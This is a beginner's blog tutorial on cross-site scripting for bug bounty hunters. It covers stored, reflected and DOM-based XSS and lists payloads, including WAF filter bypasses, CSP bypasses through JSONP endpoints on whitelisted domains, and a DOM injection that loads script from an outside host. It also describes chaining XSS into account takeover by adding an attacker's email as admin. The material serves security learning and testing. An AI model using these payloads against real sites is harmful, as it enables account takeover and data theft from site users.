All about XSS — Cross site scripting!

6 min readApr 22, 2023

Hi i am Deepak , part time bug hunter pursuing B.com

In this write-up i will discuss about XSS not in deep but for beginners who want to learn about XSS vulnerability and in the end i will share some of my payloads that i use!

Before i start let’s we discuss about What is XSS and whats its types.. etc!

What is XSS ?

Image source : https://blog.hubspot.com/

XSS stands for Cross-Site Scripting, which is a type of security vulnerability commonly found in web applications. In an XSS attack, an attacker injects malicious code or script into a web page viewed by other users.
For example :-

“><script>alert()</script>

This code is then executed in the context of the victim’s browser, allowing the attacker to steal sensitive information, perform unauthorized actions, or even take control of the victim’s account.

Types OF XSS

Stored XSS
Reflected XSS
DOM XSS

— —Stored XSS — —

Stored XSS generally occurs when user input is stored on server without proper encoding or escaping html tags or “ > <, for example in a web application there is option to publish a comment and if user input

“><script>alert()</script> in comments section and this comment saved into server, and when another user visits this page having this malicious comments this script will executes on victim account!

Here is POC video of Stored XSS for idea

STORED XSS EXAMPLE

Payloads can be used for stored xss:-

"’”“></script><img src=x onerror=alert()>{{‘7’*7}}

I use this payload for testing, why? because some how if payload don’t work properly we can still see a broken Image icon if there is some sign of HTML- injection or XSS possibility as compared to <script>alert()</script>

Now how to find stored XSS????

1st just blindly submit above payload everywhere… yes everywhere and then observe each output carefully and try to bypass if there is any WAF or Firewall

There can be there 3 common situations after observing output

1st Situation

“ > < will be encoded by web application to protect from xss there is less chances of xss still you can try different HTML entity or encodings

For example:- “><img src=x onerror=alert()> after HTML encoding
"><img src=x onerror=alert()>

2nd situation

2. when WAF remove event listeners like onload onerror etc

input payload = <img src=x onerror=alert()>
output = <img src=x>

then you can try null bytes like %00 %0a ( new line ) %0b in-between restricted words
like:-

on%00err%00or=ale%00ert()

or use <!> in between restricted words or bruteforce all enevtlistners and check which one is not filtered

in the end just search internet for bypass for particular WAF
cloudflare bypass %26lt;svg%20on%20onload%3D(alert)(document.domain)>
<a href=”javascript:alert()”>xss</a>
<a href=”javascript:this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)”>xss</a>

3rd Situation

When there is strict CSP policy

i would strongly suggest you to foloow this tricks to bypass CSP policy
https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass

If you see there domains are white listed in CSP policy

— — ->google.com

— — -> bYpass payload
"><script src=”https://www.google.com/complete/search?client=chrome&q=hello&callback=alert#1"></script>

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
— — ->googleapis.com
— — -> bypass payload

<script src=”https://www.googleapis.com/customsearch/v1?callback=alert(1)">

— — ->youtube.com
— — -> bypass payload

“><script src=”https://www.youtube.com/oembed?callback=alert;https://www.youtube.com/oembed?callback=alert;"></script>

you can easily bypass csp policy

there is many ways to bypass CSP just keep practicing you will learn with time

NOTE:- Always try to escalate Stored XSS to High severity by chaining it with account takeover or other impactful action don’t just report a alert popup, if you don’t know coding like me just use chatGPT and ask him to create a script for you then host that script on remote server and create payload:

For example there is a POSt request to with body

https://test.com/api/add/admin

email=attacker@gmail.com

ask chatgpt to create a javascript which send post request to https://test.com/api/add/admin with cookies or credentials include chatGPT will create a script for you

— — Reflected XSS — —

Reflected XSS occurs when user input is immediately returned by a web application in an error message, search result, or any other response that includes some or all of the input provided by the user as part of the request, without that data being made safe to render in the browser, and without permanently storing the user provided data.

For example :- https://xss.challenge.training.hacq.me/challenges/baby01.php?payload=%22%3E%3Cimg/src/onerror=alert(0)%3E

Here “ > not encoded by web application which cause XSS

Now you can use tool like waybackurls to find all urls params and check for XSS
for common params like

?redirect=
?msg=
?error=
?url=

Here is few payloads you can use here

%26quot;%26gt;%26lt;img%2Fsrc%2Fonerror%3Dalert()>
abc%60%3breturn+false%7d%29%3b%7d%29%3balert%60xss%60;%3c%2f%73%63%72%69%70%74%3e
javascript:this.innerHTML=String.fromCharCode(60,105,109,103,32,115,114,99,61,39,120,39,32,111,110,101,114,114,111,114,61,39,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41,59,39,62)
javascript:alert()

Generally RXSS severity is Medium as user interaction is needed here but if you can able to chain this with ATo or other critical impact then this might be in high severity bug

— — DOM BASED XSS — —

DOM-based XSS (Cross-Site Scripting) is a type of XSS attack that exploits vulnerabilities in client-side scripts and the Document Object Model (DOM) of a web page to execute malicious code in a victim’s browser.

so in simple words there is vulnerable code which can be used by attacker to manipulate DOM to execute our script

For example:-
<!DOCTYPE html>
<html>
<head>
<title>DOM-based XSS/title>
<script>
var name = window.location.hash.substring(1);
document.write(‘<h1>Hello, ‘ + name + ‘</h1>’);
</script>
</head>
<body>
</body>
</html>

Here The <script> tag is used to include JavaScript code in the document. In this case, the script retrieves the value of the hash part of the URL and uses it to construct a greeting message. The message is then written to the HTML document using document.write.

so http://example.com/#<script>alert()</script>

would be used to execute script

or like there is param in url like ?url=https://test.com

and in
<script> tag it reflects as

var x = ‘https://test.com/’

and here “ or >< not filtered properly we can use this

?url==%27;var%20script%20=%20document.createElement(%27script%27);script.src%20=%27https://bugvsme.000webhostapp.com/alert.js%27;document.head.appendChild(script);+//xcxxx

which will be shown in page like

so now this script will create a element script element or we can say script tag with src= my malicious url

I am not Good in DOm based XSS but by day by day practice i am getting to this and previously found a 0 day DOM XSS on big tech company

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

To lean more try portswigger labs https://portswigger.net/web-security/cross-site-scripting

So in then end i would say that only one thing can helps you in learning XSS vulnerability or any other vulnerability is Practice, keep practice daily after sometime you can master this skill i am on the way!

Practice by solving CTF practice on Bug bounty targets read good blogs or write-up daily, Do exercise daily eat healthy stay healthy!

Please let me know if there any correction needed in this write-up

Good bye…..

Twitter :- https://twitter.com/bug_vs_me